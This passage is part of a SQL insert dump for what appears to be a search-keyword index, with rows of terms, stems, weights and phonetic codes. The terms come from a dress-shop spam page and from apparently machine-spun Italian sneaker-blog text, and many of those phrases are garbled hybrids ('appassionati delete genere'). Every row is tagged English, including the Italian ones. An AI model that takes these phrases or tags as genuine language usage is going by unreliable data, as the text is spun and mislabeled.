not',0,1,1.2333,'A653',2,'en'),(23179,'aren\'t','aren',1,0,0.05,'A653',1,'en'),(23189,'balfleet','balfleet',0,0,0.5333,'B4143',2,'en'),(23190,'balfleet com','balfleet com',0,1,1.4,'B414325',1,'en'),(23195,'be used','be used',0,1,1.2333,'B230',1,'en'),(23196,'be used for','be used for',0,1,1.3667,'B2316',1,'en'),(23206,'below','below',0,0,0.3333,'B400',1,'en'),(23207,'below to','below to',0,1,1.2667,'B430',1,'en'),(23209,'bid','bid',0,0,0.2,'B300',1,'en'),(23217,'bottom','bottom',0,0,0.4,'B350',1,'en'),(23235,'buying','bui',0,0,0.4,'B520',1,'en'),(23273,'causes','caus',0,0,0.4,'C000',1,'en'),(23286,'clothes','cloth',0,0,0.4667,'C432',1,'en'),(23289,'com','com',0,0,0.2,'C500',1,'en'),(23301,'control','control',0,0,0.4667,'C5364',1,'en'),(23304,'custom','custom',0,0,0.4,'C350',3,'en'),(23326,'designs','design',0,0,0.4667,'D252',1,'en'),(23333,'do the','do the',0,1,1.2,'D000',1,'en'),(23335,'do you','do you',0,1,1.2,'D000',2,'en'),(23342,'done','done',0,0,0.2667,'D500',1,'en'),(23347,'dress','dress',0,0,0.3333,'D620',6,'en'),(23358,'dress in','dress in',0,1,1.2667,'D625',1,'en'),(23401,'evening dresses','even dresses',0,1,1.5,'E152362',1,'en'),(23412,'extra','extra',0,0,0.3333,'E236',2,'en'),(23436,'fans','fan',0,0,0.2667,'F520',1,'en'),(23457,'fold','fold',0,0,0.2667,'F430',1,'en'),(23477,'getting','get',0,0,0.4667,'G352',3,'en'),(23480,'give the','give the',0,1,1.2667,'G130',1,'en'),(23491,'going to','go to',0,1,1.2667,'G523',3,'en'),(23514,'has a','ha a',0,1,1.1667,'H200',2,'en'),(23566,'html','html',0,0,0.2667,'H354',1,'en'),(23576,'i am','i am',0,1,1.1333,'I500',2,'en'),(23656,'items','item',0,0,0.3333,'I352',3,'en'),(23668,'kind','kind',0,0,0.2667,'K530',2,'en'),(23669,'kind of','kind of',0,1,1.2333,'K531',1,'en'),(23692,'likely to','like to',0,1,1.3,'L243',1,'en'),(23705,'long to','long to',0,1,1.2333,'L523',1,'en'),(23707,'longer','longer',0,0,0.4,'L526',1,'en'),(23733,'marriage','marriag',0,0,0.5333,'M620',1,'en'),(23736,'material','materi',0,0,0.5333,'M364',4,'en'),(23741,'may be','mai be',0,1,1.2,'M100',3,'en'),(23743,'meaning','mean',0,0,0.4667,'M200',1,'en'),(23772,'nice','nice',0,0,0.2667,'N200',1,'en'),(23789,'of work','of work',0,1,1.2333,'O162',1,'en'),(23800,'oh','oh',0,0,0.1333,'O000',1,'en'),(23803,'okay','okai',0,0,0.2667,'O200',1,'en'),(23818,'ontario','ontario',0,0,0.4667,'O536',1,'en'),(23821,'onto','onto',0,0,0.2667,'O530',1,'en'),(23865,'persons','person',0,0,0.4667,'P6252',1,'en'),(23878,'please','pleas',0,0,0.4,'P420',1,'en'),(23888,'private','privat',0,0,0.4667,'P613',2,'en'),(23894,'prohibited','prohibit',0,0,0.6667,'P613',1,'en'),(23903,'purposes','purpos',0,0,0.5333,'P612',1,'en'),(23912,'rests','rest',0,0,0.3333,'R232',1,'en'),(23937,'see the','see the',0,1,1.2333,'S300',1,'en'),(23939,'serve','serv',0,0,0.3333,'S610',1,'en'),(23967,'short','short',0,0,0.3333,'S630',3,'en'),(23978,'sign','sign',0,0,0.2667,'S500',1,'en'),(23981,'simply','simpli',0,0,0.4,'S514',3,'en'),(23982,'simply by','simpli by',0,1,1.3,'S5141',1,'en'),(23984,'size','size',0,0,0.2667,'S000',2,'en'),(23990,'so many','so many',0,1,1.2333,'S500',1,'en'),(23993,'so that','so that',0,1,1.2333,'S300',2,'en'),(23995,'so you','so you',0,1,1.2,'S000',1,'en'),(24001,'sometimes','sometim',0,0,0.6,'S5352',2,'en'),(24007,'specialist','specialist',0,0,0.6667,'S12423',1,'en'),(24015,'step','step',0,0,0.2667,'S310',1,'en'),(24042,'tape','tape',0,0,0.2667,'T100',1,'en'),(24123,'thought','thought',0,0,0.4667,'T230',1,'en'),(24130,'title','titl',0,0,0.3333,'T400',1,'en'),(24164,'to work','to work',0,1,1.2333,'T620',1,'en'),(24184,'tremendous','tremend',0,0,0.6667,'T6532',1,'en'),(24187,'troublesome','troublesom',0,0,0.7333,'T61425',1,'en'),(24196,'use a','us a',0,1,1.1667,'U200',1,'en'),(24198,'used for','us for',0,1,1.2667,'U2316',1,'en'),(24202,'using the','us the',0,1,1.3,'U2523',2,'en'),(24225,'wedding dresses','wed dresses',0,1,1.5,'W352362',1,'en'),(24227,'weight','weight',0,0,0.4,'W230',2,'en'),(24238,'where you','where you',0,1,1.3,'W600',2,'en'),(24244,'will be used','will be used',0,1,1.4,'W4123',1,'en'),(24258,'work a','work a',0,1,1.2,'W620',1,'en'),(24269,'write','write',0,0,0.3333,'W630',1,'en'),(24274,'www balfleet','www balfleet',0,1,1.4,'W14143',1,'en'),(24275,'www balfleet com','www balfleet com',0,1,1.5333,'W1414325',1,'en'),(24311,'you will','you will',0,1,1.2667,'Y400',2,'en'),(24339,'\'forest','forest',0,0,0.4667,'F623',1,'en'),(24340,'\'forest black','forest black',0,1,1.4333,'F623142',1,'en'),(24341,'\'forest black 12','forest black 12',0,1,1.5333,'F623142',1,'en'),(24342,'\'forest black volt\'','forest black volt',0,1,1.6333,'F623142143',1,'en'),(24343,'\'s','s',0,0,0.1333,'S000',2,'en'),(24344,'\'s capsule','s capsule',0,1,1.3333,'S124',1,'en'),(24345,'\'s capsule catalogue','s capsule catalogue',0,1,1.6667,'S1242342',1,'en'),(24346,'\'s capsule chain','s capsule chain',0,1,1.5333,'S12425',1,'en'),(24347,'\'urban','urban',0,0,0.4,'U615',1,'en'),(24348,'\'urban safari\'','urban safari',0,1,1.4667,'U615216',1,'en'),(24349,'\'urban safari\' put','urban safari put',0,1,1.6,'U61521613',1,'en'),(24350,'12 anni','12 anni',0,1,1.2333,'A500',1,'en'),(24351,'12 anni ed','12 anni ed',0,1,1.3333,'A530',1,'en'),(24352,'12 giugno','12 giugno',0,1,1.3,'G500',1,'en'),(24353,'12 giugno 2013','12 giugno 2013',0,1,1.4667,'G500',1,'en'),(24354,'133','133',0,0,0.3,'',1,'en'),(24355,'14','14',0,0,0.2,'',2,'en'),(24356,'14 giugno','14 giugno',0,1,1.3,'G500',1,'en'),(24357,'14 giugno con','14 giugno con',0,1,1.4333,'G525',1,'en'),(24358,'16','16',0,0,0.2,'',1,'en'),(24359,'16 ottobre','16 ottobre',0,1,1.3333,'O316',1,'en'),(24360,'16 ottobre 2012','16 ottobre 2012',0,1,1.5,'O316',1,'en'),(24361,'2012','2012',0,0,0.4,'',1,'en'),(24362,'2012 sportydoo','2012 sportydoo',0,1,1.4667,'S163',1,'en'),(24363,'2012 sportydoo web','2012 sportydoo web',0,1,1.6,'S1631',1,'en'),(24364,'2013','2013',0,0,0.4,'',6,'en'),(24365,'2013 sportydoo','2013 sportydoo',0,1,1.4667,'S163',1,'en'),(24366,'2013 sportydoo blogging','2013 sportydoo blogging',0,1,1.7667,'S16314252',1,'en'),(24367,'3 modelli','3 modelli',0,1,1.3,'M340',1,'en'),(24368,'3 modelli di','3 modelli di',0,1,1.4,'M343',1,'en'),(24369,'3 nuovi','3 nuovi',0,1,1.2333,'N100',1,'en'),(24370,'3 nuovi modelli','3 nuovi modelli',0,1,1.5,'N1534',1,'en'),(24371,'7 sized','7 sized',0,1,1.2333,'S300',1,'en'),(24372,'7 sized roshe','7 sized roshe',0,1,1.4333,'S362',1,'en'),(24373,'a collaborare','a collaborare',0,1,1.4333,'A2416',1,'en'),(24374,'a collaborare da','a collaborare da',0,1,1.5333,'A24163',1,'en'),(24375,'a collaborare questa','a collaborare questa',0,1,1.6667,'A241623',1,'en'),(24376,'a distanza','a distanza',0,1,1.3333,'A32352',1,'en'),(24377,'a distanza di','a distanza di',0,1,1.4333,'A323523',1,'en'),(24378,'a lanciare','a lanciare',0,1,1.3333,'A4526',1,'en'),(24379,'a lanciare una','a lanciare una',0,1,1.4667,'A45265',1,'en'),(24380,'a riguardo','a riguardo',0,1,1.3333,'A6263',1,'en'),(24381,'a riguardo ai','a riguardo ai',0,1,1.4333,'A6263',1,'en'),(24382,'a tutti','a tutti',0,1,1.2333,'A300',1,'en'),(24383,'a tutti gli','a tutti gli',0,1,1.3667,'A324',1,'en'),(24384,'acg','acg',0,0,0.2,'A200',1,'en'),(24385,'acg del','acg del',0,1,1.2333,'A234',1,'en'),(24386,'acg del brand','acg del brand',0,1,1.4333,'A2341653',1,'en'),(24387,'acg del completely','acg del completely',0,1,1.6,'A234251434',1,'en'),(24388,'acg viene','acg viene',0,1,1.3,'A215',1,'en'),(24389,'acg viene presentata','acg viene presentata',0,1,1.6667,'A21516253',1,'en'),(24390,'acg withinside','acg withinside',0,1,1.4667,'A23523',1,'en'),(24391,'acg withinside blogbabel','acg withinside blogbabel',0,1,1.8,'A2352314214',1,'en'),(24392,'adatta','adatta',0,0,0.4,'A300',1,'en'),(24393,'adatta a','adatta a',0,1,1.2667,'A300',1,'en'),(24394,'adatta a tutti','adatta a tutti',0,1,1.4667,'A300',1,'en'),(24395,'adatte','adatt',0,0,0.4,'A300',1,'en'),(24396,'adatte anche','adatt anche',0,1,1.4,'A352',1,'en'),(24397,'adatte anche alle','adatt anche alle',0,1,1.5667,'A3524',1,'en'),(24398,'adcb 2','adcb 2',0,1,1.2,'A321',1,'en'),(24399,'ai','ai',0,0,0.1333,'A000',2,'en'),(24400,'ai engineers','ai engineers',0,1,1.4,'A52562',1,'en'),(24401,'ai engineers nike','ai engineers nike',0,1,1.5667,'A5256252',1,'en'),(24402,'air foamposite','air foamposite',0,1,1.4667,'A615123',1,'en'),(24403,'air foamposite seasoned','air foamposite seasoned',0,1,1.7667,'A615123253',1,'en'),(24404,'al glorioso','al glorioso',0,1,1.3667,'A42462',1,'en'),(24405,'al glorioso passato','al glorioso passato',0,1,1.6333,'A42462123',1,'en'),(24406,'al passato','al passato',0,1,1.3333,'A4123',1,'en'),(24407,'al passato acg','al passato acg',0,1,1.4667,'A41232',1,'en'),(24408,'alcuni','alcuni',0,0,0.4,'A425',1,'en'),(24409,'alcuni ralph','alcuni ralph',0,1,1.4,'A425641',1,'en'),(24410,'alcuni ralph lauren','alcuni ralph lauren',0,1,1.6333,'A425641465',1,'en'),(24411,'alla','alla',0,0,0.2667,'A400',3,'en'),(24412,'alla divicuandoone','alla divicuandoone',0,1,1.6,'A4312535',1,'en'),(24413,'alla divicuandoone acg','alla divicuandoone acg',0,1,1.7333,'A43125352',1,'en'),(24414,'alle','all',0,0,0.2667,'A400',1,'en'),(24415,'alle strade','all strade',0,1,1.3667,'A42363',1,'en'),(24416,'alle strade di','all strade di',0,1,1.4667,'A42363',1,'en'),(24417,'altri','altri',0,0,0.3333,'A436',2,'en'),(24418,'altri sono','altri sono',0,1,1.3333,'A43625',1,'en'),(24419,'altri sono fatte','altri sono fatte',0,1,1.5333,'A4362513',1,'en'),(24420,'ama','ama',0,0,0.2,'A500',1,'en'),(24421,'ama le','ama le',0,1,1.2,'A540',1,'en'),(24422,'ama le nike','ama le nike',0,1,1.3667,'A5452',1,'en'),(24423,'amount vitamin','amount vitamin',0,1,1.4667,'A53135',1,'en'),(24424,'amount vitamin y','amount vitamin y',0,1,1.5333,'A53135',1,'en'),(24425,'anche','anch',0,0,0.3333,'A520',3,'en'),(24426,'anche alle','anch alle',0,1,1.3333,'A524',1,'en'),(24427,'anche alle strade','anch alle strade',0,1,1.5667,'A5242363',1,'en'),(24428,'and every','and every',0,1,1.3,'A5316',3,'en'),(24429,'and every chi','and every chi',0,1,1.4333,'A53162',1,'en'),(24430,'anni','anni',0,0,0.2667,'A500',2,'en'),(24431,'anni ed','anni ed',0,1,1.2333,'A530',1,'en'),(24432,'anni ed ora','anni ed ora',0,1,1.3667,'A536',1,'en'),(24433,'anno','anno',0,0,0.2667,'A500',2,'en'),(24434,'anno dall\'ultima','anno dall',0,1,1.5333,'A53435',1,'en'),(24435,'anno dall\'ultima volta','anno dall volta',0,1,1.7333,'A53435143',1,'en'),(24436,'appassionati','appassionati',0,0,0.8,'A1253',1,'en'),(24437,'appassionati delete','appassionati delete',0,1,1.6333,'A125343',1,'en'),(24438,'appassionati delete genere','appassionati delete genere',0,1,1.8667,'A125343256',1,'en'),(24439,'apposta','apposta',0,0,0.4667,'A123',1,'en'),(24440,'apposta each','apposta each',0,1,1.4,'A1232',1,'en'),(24441,'apposta each and','apposta each and',0,1,1.5333,'A123253',1,'en'),(24442,'approfondire','approfondir',0,0,0.8,'A161536',1,'en'),(24443,'approfondire su','approfondir su',0,1,1.5,'A1615362',1,'en'),(24444,'approfondire su gq','approfondir su gq',0,1,1.6,'A1615362',1,'en'),(24445,'attrezzature','attrezzatur',0,0,0.8,'A36236',1,'en'),(24446,'attrezzature sportive','attrezzatur sportive',0,1,1.7,'A3623621631',1,'en'),(24447,'attrezzature sportive stussy','attrezzatur sportive stussy',0,1,1.9333,'A3623621631232',1,'en'),(24448,'avvicina','avvicina',0,0,0.5333,'A125',1,'en'),(24449,'avvicina al','avvicina al',0,1,1.3667,'A1254',1,'en'),(24450,'avvicina al passato','avvicina al passato',0,1,1.6333,'A1254123',1,'en'),(24451,'basata','basata',0,0,0.4,'B230',1,'en'),(24452,'basata sulla','basata sulla',0,1,1.4,'B2324',1,'en'),(24453,'basata sulla nuova','basata sulla nuova',0,1,1.6,'B232451',1,'en'),(24454,'black 12','black 12',0,1,1.2667,'B420',1,'en'),(24455,'black 12 giugno','black 12 giugno',0,1,1.5,'B425',1,'en'),(24456,'black volt\'','black volt',0,1,1.3667,'B42143',1,'en'),(24457,'black volt\' foto','black volt foto',0,1,1.5333,'B4214313',1,'en'),(24458,'blogbabel','blogbabel',0,0,0.6,'B4214',1,'en'),(24459,'blogbabel nike','blogbabel nike',0,1,1.4667,'B421452',1,'en'),(24460,'blogbabel nike sb','blogbabel nike sb',0,1,1.5667,'B4214521',1,'en'),(24461,'blogging','blog',0,0,0.5333,'B4252',1,'en'),(24462,'blogging sulle','blog sulle',0,1,1.4667,'B42524',1,'en'),(24463,'blogging sulle attrezzature','blog sulle attrezzature',0,1,1.9,'B4252436236',1,'en'),(24464,'brand la','brand la',0,1,1.2667,'B6534',1,'en'),(24465,'brand la collaborazione','brand la collaborazione',0,1,1.7667,'B6534241625',1,'en'),(24466,'bunch','bunch',0,0,0.3333,'B520',1,'en'),(24467,'bunch system','bunch system',0,1,1.4,'B5235',1,'en'),(24468,'bunch system la','bunch system la',0,1,1.5,'B52354',1,'en'),(24469,'c\'è','c',0,0,0.2,'C000',2,'en'),(24470,'c\'è un\'intervista','c un',0,1,1.5667,'C536123',1,'en'),(24471,'c\'è un\'intervista a','c un a',0,1,1.6333,'C536123',1,'en'),(24472,'calzature','calzatur',0,0,0.6,'C4236',1,'en'),(24473,'calzature leggeri','calzatur leggeri',0,1,1.5667,'C4236426',1,'en'),(24474,'calzature leggeri e','calzatur leggeri e',0,1,1.6333,'C4236426',1,'en'),(24475,'camouflage','camouflag',0,0,0.6667,'C5142',1,'en'),(24476,'camouflage clothing','camouflag clothing',0,1,1.6333,'C51424352',1,'en'),(24477,'camouflage clothing la','camouflag clothing la',0,1,1.7333,'C514243524',1,'en'),(24478,'capsule','capsul',0,0,0.4667,'C124',1,'en'),(24479,'capsule catalogue','capsul catalogue',0,1,1.5667,'C1242342',1,'en'),(24480,'capsule catalogue nike','capsul catalogue nike',0,1,1.7333,'C124234252',1,'en'),(24481,'capsule chain','capsul chain',0,1,1.4333,'C12425',1,'en'),(24482,'capsule chain a','capsul chain a',0,1,1.5,'C12425',1,'en'),(24483,'catalogue','catalogu',0,0,0.6,'C342',1,'en'),(24484,'catalogue nike','catalogu nike',0,1,1.4667,'C34252',1,'en'),(24485,'catalogue nike e','catalogu nike e',0,1,1.5333,'C34252',1,'en'),(24486,'chain','chain',0,0,0.3333,'C500',4,'en'),(24487,'chain a','chain a',0,1,1.2333,'C500',1,'en'),(24488,'chain a distanza','chain a distanza',0,1,1.5333,'C532352',1,'en'),(24489,'che','che',0,0,0.2,'C000',4,'en'),(24490,'che si','che si',0,1,1.2,'C000',1,'en'),(24491,'che si avvicina','che si avvicina',0,1,1.5,'C125',1,'en'),(24492,'che strizza','che strizza',0,1,1.3667,'C362',1,'en'),(24493,'che strizza l\'occhio','che strizza l',0,1,1.6667,'C36242',1,'en'),(24494,'chi','chi',0,0,0.2,'C000',2,'en'),(24495,'chi ama','chi ama',0,1,1.2333,'C500',1,'en'),(24496,'chi ama le','chi ama le',0,1,1.3333,'C540',1,'en'),(24497,'città','città',0,0,0.3333,'C300',1,'en'),(24498,'città i','città i',0,1,1.2333,'C300',1,'en'),(24499,'città i materiali','città i materiali',0,1,1.5667,'C35364',1,'en'),(24500,'clothing','cloth',0,0,0.5333,'C4352',1,'en'),(24501,'clothing la','cloth la',0,1,1.3667,'C43524',1,'en'),(24502,'clothing la nike','cloth la nike',0,1,1.5333,'C4352452',1,'en'),(24503,'collaborare','collaborar',0,0,0.7333,'C416',1,'en'),(24504,'collaborare da','collaborar da',0,1,1.4667,'C4163',1,'en'),(24505,'collaborare da 12','collaborar da 12',0,1,1.5667,'C4163',1,'en'),(24506,'collaborare questa','collaborar questa',0,1,1.6,'C41623',1,'en'),(24507,'collaborare questa volta','collaborar questa volta',0,1,1.8,'C41623143',1,'en'),(24508,'collaborazione','collaborazion',0,0,0.9333,'C41625',1,'en'),(24509,'collaborazione minus','collaborazion minus',0,1,1.6667,'C416252',1,'en'),(24510,'collaborazione minus stussy','collaborazion minus stussy',0,1,1.9,'C41625232',1,'en'),(24511,'collaborazione tra','collaborazion tra',0,1,1.6,'C4162536',1,'en'),(24512,'collaborazione tra amount','collaborazion tra amount',0,1,1.8333,'C416253653',1,'en'),(24513,'collezione','collezion',0,0,0.6667,'C425',1,'en'),(24514,'collezione adatta','collezion adatta',0,1,1.5667,'C4253',1,'en'),(24515,'collezione adatta a','collezion adatta a',0,1,1.6333,'C4253',1,'en'),(24516,'collezione completa','collezion completa',0,1,1.6333,'C42525143',1,'en'),(24517,'collezione completa basata','collezion completa basata',0,1,1.8667,'C42525143123',1,'en'),(24518,'collezione rende','collezion rende',0,1,1.5333,'C425653',1,'en'),(24519,'collezione rende omaggio','collezion rende omaggio',0,1,1.8,'C42565352',1,'en'),(24520,'collezione sono','collezion sono',0,1,1.5,'C42525',1,'en'),(24521,'collezione sono ralph','collezion sono ralph',0,1,1.7,'C42525641',1,'en'),(24522,'colorazionidire','colorazionidir',0,0,1,'C462536',1,'en'),(24523,'colorazionidire la','colorazionidir la',0,1,1.6,'C4625364',1,'en'),(24524,'colorazionidire la safari','colorazionidir la safari',0,1,1.8333,'C4625364216',1,'en'),(24525,'cominciamo','cominciamo',0,0,0.6667,'C525',1,'en'),(24526,'cominciamo con','cominciamo con',0,1,1.4667,'C52525',1,'en'),(24527,'cominciamo con la','cominciamo con la',0,1,1.5667,'C525254',1,'en'),(24528,'completa','completa',0,0,0.5333,'C5143',1,'en'),(24529,'completa basata','completa basata',0,1,1.5,'C5143123',1,'en'),(24530,'completa basata sulla','completa basata sulla',0,1,1.7,'C514312324',1,'en'),(24531,'completely','complet',0,0,0.6667,'C51434',2,'en'),(24532,'completely 16','complet 16',0,1,1.4333,'C51434',1,'en'),(24533,'completely 16 ottobre','complet 16 ottobre',0,1,1.7,'C51434316',1,'en'),(24534,'composta','composta',0,0,0.5333,'C5123',1,'en'),(24535,'composta da','composta da',0,1,1.3667,'C5123',1,'en'),(24536,'composta da tre','composta da tre',0,1,1.5,'C51236',1,'en'),(24537,'con','con',0,0,0.2,'C500',4,'en'),(24538,'con la','con la',0,1,1.2,'C540',1,'en'),(24539,'con la nike','con la nike',0,1,1.3667,'C5452',1,'en'),(24540,'con una','con una',0,1,1.2333,'C500',2,'en'),(24541,'con una stampa','con una stampa',0,1,1.4667,'C52351',1,'en'),(24542,'concerning','concern',0,0,0.6667,'C52652',5,'en'),(24543,'concerning la','concern la',0,1,1.4333,'C526524',1,'en'),(24544,'concerning la realizzazione','concern la realizzazione',0,1,1.9,'C5265246425',1,'en'),(24545,'continuano','continuano',0,0,0.6667,'C535',1,'en'),(24546,'continuano a','continuano a',0,1,1.4,'C535',1,'en'),(24547,'continuano a collaborare','continuano a collaborare',0,1,1.8,'C5352416',1,'en'),(24548,'contrasting','contrast',0,0,0.7333,'C5362352',1,'en'),(24549,'contrasting colorazionidire','contrast colorazionidire',0,1,1.9,'C5362352462536',1,'en'),(24550,'contrasting colorazionidire la','contrast colorazionidire la',0,1,2,'C53623524625364',1,'en'),(24551,'cuando','cuando',0,0,0.4,'C530',1,'en'),(24552,'cuando tratta','cuando tratta',0,1,1.4333,'C5363',1,'en'),(24553,'cuando tratta delle','cuando tratta delle',0,1,1.6333,'C53634',1,'en'),(24554,'da','da',0,0,0.1333,'D000',4,'en'),(24555,'da 12','da 12',0,1,1.1667,'D000',1,'en'),(24556,'da 12 anni','da 12 anni',0,1,1.3333,'D500',1,'en'),(24557,'da tre','da tre',0,1,1.2,'D600',2,'en'),(24558,'da tre se','da tre se',0,1,1.3,'D620',1,'en'),(24559,'dal','dal',0,0,0.2,'D400',2,'en'),(24560,'dal 14','dal 14',0,1,1.2,'D400',1,'en'),(24561,'dal 14 giugno','dal 14 giugno',0,1,1.4333,'D425',1,'en'),(24562,'dall\'ultima','dall',0,0,0.7333,'D435',1,'en'),(24563,'dall\'ultima volta','dall volta',0,1,1.5667,'D435143',1,'en'),(24564,'dall\'ultima volta stussy','dall volta stussy',0,1,1.8,'D435143232',1,'en'),(24565,'del','del',0,0,0.2,'D400',2,'en'),(24566,'del brand','del brand',0,1,1.3,'D41653',1,'en'),(24567,'del brand la','del brand la',0,1,1.4,'D416534',1,'en'),(24568,'del completely','del completely',0,1,1.4667,'D4251434',1,'en'),(24569,'del completely 16','del completely 16',0,1,1.5667,'D4251434',1,'en'),(24570,'del di','del di',0,1,1.2,'D430',1,'en'),(24571,'del di ieri','del di ieri',0,1,1.3667,'D436',1,'en'),(24572,'delete','delet',0,0,0.4,'D430',2,'en'),(24573,'delete genere','delet genere',0,1,1.4333,'D43256',1,'en'),(24574,'delete genere divisa','delet genere divisa',0,1,1.6667,'D43256312',1,'en'),(24575,'della','della',0,0,0.3333,'D400',2,'en'),(24576,'della collaborazione','della collaborazione',0,1,1.6667,'D4241625',1,'en'),(24577,'della collaborazione tra','della collaborazione tra',0,1,1.8,'D424162536',1,'en'),(24578,'della collezione','della collezione',0,1,1.5333,'D42425',1,'en'),(24579,'della collezione sono','della collezione sono',0,1,1.7,'D4242525',1,'en'),(24580,'delle','dell',0,0,0.3333,'D400',3,'en'),(24581,'delle nuoviscuandome','dell nuoviscuandome',0,1,1.6667,'D4512535',1,'en'),(24582,'delle nuoviscuandome roshe','dell nuoviscuandome roshe',0,1,1.8667,'D451253562',1,'en'),(24583,'di','di',0,0,0.1333,'D000',4,'en'),(24584,'di altri','di altri',0,1,1.2667,'D436',1,'en'),(24585,'di altri sono','di altri sono',0,1,1.4333,'D43625',1,'en'),(24586,'di calzature','di calzature',0,1,1.4,'D24236',1,'en'),(24587,'di calzature leggeri','di calzature leggeri',0,1,1.6667,'D24236426',1,'en'),(24588,'di città','di città',0,1,1.2667,'D230',1,'en'),(24589,'di città i','di città i',0,1,1.3333,'D230',1,'en'),(24590,'di ieri','di ieri',0,1,1.2333,'D600',1,'en'),(24591,'di ieri e','di ieri e',0,1,1.3,'D600',1,'en'),(24592,'di look','di look',0,1,1.2333,'D420',1,'en'),(24593,'di look e','di look e',0,1,1.3,'D420',1,'en'),(24594,'di nike','di nike',0,1,1.2333,'D520',1,'en'),(24595,'di nike è','di nike è',0,1,1.3,'D520',1,'en'),(24596,'di nike gna','di nike gna',0,1,1.3667,'D525',1,'en'),(24597,'di nike off','di nike off',0,1,1.3667,'D521',1,'en'),(24598,'di oggi','di oggi',0,1,1.2333,'D200',1,'en'),(24599,'di oggi che','di oggi che',0,1,1.3667,'D200',1,'en'),(24600,'di united','di united',0,1,1.3,'D530',2,'en'),(24601,'di united nations','di united nations',0,1,1.5667,'D535352',2,'en'),(24602,'disponibili','disponibili',0,0,0.7333,'D21514',1,'en'),(24603,'disponibili dal','disponibili dal',0,1,1.5,'D2151434',1,'en'),(24604,'disponibili dal 14','disponibili dal 14',0,1,1.6,'D2151434',1,'en'),(24605,'distanza','distanza',0,0,0.5333,'D2352',1,'en'),(24606,'distanza di','distanza di',0,1,1.3667,'D23523',1,'en'),(24607,'distanza di united','distanza di united',0,1,1.6,'D2352353',1,'en'),(24608,'divicuandoone','divicuandoon',0,0,0.8667,'D12535',1,'en'),(24609,'divicuandoone acg','divicuandoon acg',0,1,1.5667,'D125352',1,'en'),(24610,'divicuandoone acg viene','divicuandoon acg viene',0,1,1.7667,'D12535215',1,'en'),(24611,'divisa','divisa',0,0,0.4,'D120',1,'en'),(24612,'divisa in','divisa in',0,1,1.3,'D125',1,'en'),(24613,'divisa in prosecute','divisa in prosecute',0,1,1.6333,'D1251623',1,'en'),(24614,'due contrasting','due contrasting',0,1,1.5,'D25362352',1,'en'),(24615,'due contrasting colorazionidire','due contrasting colorazionidire',0,1,2,'D25362352462536',1,'en'),(24616,'è composta','è composta',0,1,1.3333,'è25123',1,'en'),(24617,'è composta da','è composta da',0,1,1.4333,'è25123',1,'en'),(24618,'e foamposite','e foamposite',0,1,1.4,'E15123',1,'en'),(24619,'e foamposite pro','e foamposite pro',0,1,1.5333,'E1512316',1,'en'),(24620,'è il','è il',0,1,1.1333,'è400',2,'en'),(24621,'è il una','è il una',0,1,1.2667,'è450',1,'en'),(24622,'è la','è la',0,1,1.1333,'è400',2,'en'),(24623,'è la nuova','è la nuova',0,1,1.3333,'è451',1,'en'),(24624,'e nike','e nike',0,1,1.2,'E520',1,'en'),(24625,'e nike tornano','e nike tornano',0,1,1.4667,'E52365',1,'en'),(24626,'e performanti','e performanti',0,1,1.4333,'E161653',1,'en'),(24627,'e performanti off','e performanti off',0,1,1.5667,'E1616531',1,'en'),(24628,'e stussy','e stussy',0,1,1.2667,'E232',1,'en'),(24629,'e stussy continuano','e stussy continuano',0,1,1.6333,'E232535',1,'en'),(24630,'e tecnologie','e tecnologie',0,1,1.4,'E32542',1,'en'),(24631,'e tecnologie che','e tecnologie che',0,1,1.5333,'E32542',1,'en'),(24632,'è una','è una',0,1,1.1667,'è500',3,'en'),(24633,'è una miscela','è una miscela',0,1,1.4333,'è524',1,'en'),(24634,'each and','each and',0,1,1.2667,'E253',3,'en'),(24635,'each and every','each and every',0,1,1.4667,'E25316',3,'en'),(24636,'ed ora','ed ora',0,1,1.2,'E360',1,'en'),(24637,'ed ora sono','ed ora sono',0,1,1.3667,'E3625',1,'en'),(24638,'encouraged','encourag',0,0,0.6667,'E52623',1,'en'),(24639,'encouraged di','encourag di',0,1,1.4333,'E52623',1,'en'),(24640,'encouraged di nike','encourag di nike',0,1,1.6,'E5262352',1,'en'),(24641,'engineers','engin',0,0,0.6,'E52562',1,'en'),(24642,'engineers nike','engin nike',0,1,1.4667,'E5256252',1,'en'),(24643,'engineers nike e','engin nike e',0,1,1.5333,'E5256252',1,'en'),(24644,'every chi','everi chi',0,1,1.3,'E162',1,'en'),(24645,'every chi ama','everi chi ama',0,1,1.4333,'E1625',1,'en'),(24646,'executive','execut',0,0,0.6,'E231',2,'en'),(24647,'executive \'forest','execut forest',0,1,1.5667,'E231623',1,'en'),(24648,'executive \'forest black','execut forest black',0,1,1.7667,'E231623142',1,'en'),(24649,'fatte','fatt',0,0,0.3333,'F300',1,'en'),(24650,'fatte apposta','fatt apposta',0,1,1.4333,'F3123',1,'en'),(24651,'fatte apposta each','fatt apposta each',0,1,1.6,'F31232',1,'en'),(24652,'foamposite','foamposit',0,0,0.6667,'F5123',1,'en'),(24653,'foamposite pro','foamposit pro',0,1,1.4667,'F512316',1,'en'),(24654,'foamposite pro \'forest','foamposit pro forest',0,1,1.7333,'F5123161623',1,'en'),(24655,'foamposite seasoned','foamposit seasoned',0,1,1.6333,'F5123253',1,'en'),(24656,'foamposite seasoned executive','foamposit seasoned executive',0,1,1.9667,'F5123253231',1,'en'),(24657,'footwear','footwear',0,0,0.5333,'F360',1,'en'),(24658,'footwear nike','footwear nike',0,1,1.4333,'F3652',1,'en'),(24659,'footwear nike size','footwear nike size',0,1,1.6,'F3652',1,'en'),(24660,'foto','foto',0,0,0.2667,'F300',1,'en'),(24661,'foto vi','foto vi',0,1,1.2333,'F310',1,'en'),(24662,'foto vi presentiamo','foto vi presentiamo',0,1,1.6333,'F3162535',1,'en'),(24663,'frutto','frutto',0,0,0.4,'F630',1,'en'),(24664,'frutto della','frutto della',0,1,1.4,'F634',1,'en'),(24665,'frutto della collaborazione','frutto della collaborazione',0,1,1.9,'F634241625',1,'en'),(24666,'genere','gener',0,0,0.4,'G560',2,'en'),(24667,'genere divisa','gener divisa',0,1,1.4333,'G56312',1,'en'),(24668,'genere divisa in','gener divisa in',0,1,1.5333,'G563125',1,'en'),(24669,'giugno','giugno',0,0,0.4,'G500',1,'en'),(24670,'giugno 2013','giugno 2013',0,1,1.3667,'G500',1,'en'),(24671,'giugno 2013 sportydoo','giugno 2013 sportydoo',0,1,1.7,'G52163',1,'en'),(24672,'giugno con','giugno con',0,1,1.3333,'G525',1,'en'),(24673,'giugno con una','giugno con una',0,1,1.4667,'G525',1,'en'),(24674,'gli','gli',0,0,0.2,'G400',3,'en'),(24675,'gli appassionati','gli appassionati',0,1,1.5333,'G41253',1,'en'),(24676,'gli appassionati delete','gli appassionati 